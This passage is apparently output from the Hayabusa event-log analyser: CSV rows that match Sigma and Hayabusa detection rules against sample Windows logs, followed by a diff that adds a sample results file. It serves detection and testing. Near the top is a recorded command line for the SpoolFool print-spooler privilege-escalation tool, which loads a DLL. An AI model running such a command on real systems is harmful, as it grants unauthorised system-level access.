+2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit 
-command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx +2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx diff --git a/sample-evtx.csv b/sample-evtx.csv new file mode 100644 index 00000000..303b4e52 --- /dev/null +++ b/sample-evtx.csv 
@@ -0,0 +1,16623 @@
+Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
+2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Guest Shutdown Service | Path: 
%SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service 
Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators 
Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time 
Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 
02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:29.131 
+09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 
+09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service 
Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:07:16.729 
+09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service 
Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | 
LID: 0x39a67,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: 
IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
